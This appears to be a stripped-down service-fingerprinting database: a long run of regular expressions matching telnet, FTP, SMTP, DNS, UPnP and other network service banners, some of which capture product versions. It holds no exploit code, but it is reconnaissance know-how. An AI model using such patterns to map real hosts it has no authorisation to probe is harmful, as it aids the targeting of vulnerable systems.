\d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 +\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n +220 ESMTP Service ready\r\n500 Command unrecognized\r\n +220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n +220 WebMail ESMTP\r\n502 negative vibes\r\n +220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n +220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n +220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd +220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n +220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n +220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n +220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n +220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n +220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n +220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n +220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n +220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: +220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n +220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n +220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n +220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n +503 Synchronization error\r\n +(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) +Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n +Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n +Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n +\x05\xff 